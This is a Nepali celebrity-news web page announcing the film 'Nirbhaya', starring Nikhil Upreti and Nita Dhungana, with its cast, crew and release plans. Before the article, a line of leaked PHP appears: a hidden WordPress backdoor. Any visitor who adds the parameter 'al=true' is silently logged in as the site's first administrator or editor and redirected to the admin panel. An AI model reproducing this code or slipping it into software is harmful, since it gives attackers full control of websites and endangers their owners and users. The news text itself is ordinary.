// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); नीखिल संग नीताको स्क्रिन शेयर बन्ने भो निर्भय | Celebrity Nepal

नीखिल संग नीताको स्क्रिन शेयर बन्ने भो निर्भय


सेलिब्रेटी नेपाल काठमाडौँ
नायक निखिल उप्रती भैरव बाट नेपाली चलचित्र क्षेत्रमा फर्किएपछि उनको व्यस्तता बढेको छ । व्यस्त नायक निखिल मुख्य भूमिकामा रहेको चलचित्र ‘निर्भय’को शुभमुहुर्त सम्पन्न भएको छ । राजधानीमा औपचारिक कार्यक्रमको आयोजना गरि घोषणा गरिएको चलचित्र ‘निर्भय’ मा एक्शन स्टार निखिलको जोडी बनेर देखिदैछिन् नायिका नीता ढुङ्गाना । मधुसुदन भट्टराईको निर्देशनमा बन्ने चलचित्रमा निखिल र नीताका साथमा रामचन्द्र अधिकारी, सुशिल पोखरेल, विकास चापागाईं, प्रज्वल गिरी, मनोज केसी, कृष्ण शिवाकोटी लगायतका कलाकारको मुख्य अभिनय रहनेछ । यसै साता छायाँकनमा जाने भनिएको चलचित्रले नेपाली समाजमा दैनिक रुपमा जनताले देखिरहेको अनि भोगिरहेको कथालाई उठान गर्ने छ ।
nirbhaya
ताराप्रकाश लिम्बु र अर्जुन पोखरेलको संगीत रहने चलचित्रमा नृत्य रामजी लामिछानेको रहनेछ भने प्रोडक्शन डिजाईनरमा सुवास काफ्ले रहेका छन् । प्रसिद्धी सिने आर्ट्स व्यानरमा बन्ने चलचित्रमा देविप्रसाद पाण्डेको लगानी रहने छ । यम थापाले लेखेको कथामा रामशरण उप्रेतीको छायाँकन, हिमाल केसीको द्वन्द्व रहेको छ। चलचित्र आउँदो मंसिरमा प्रदर्शन गर्ने निर्माण पक्षको योजना रहेको छ ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.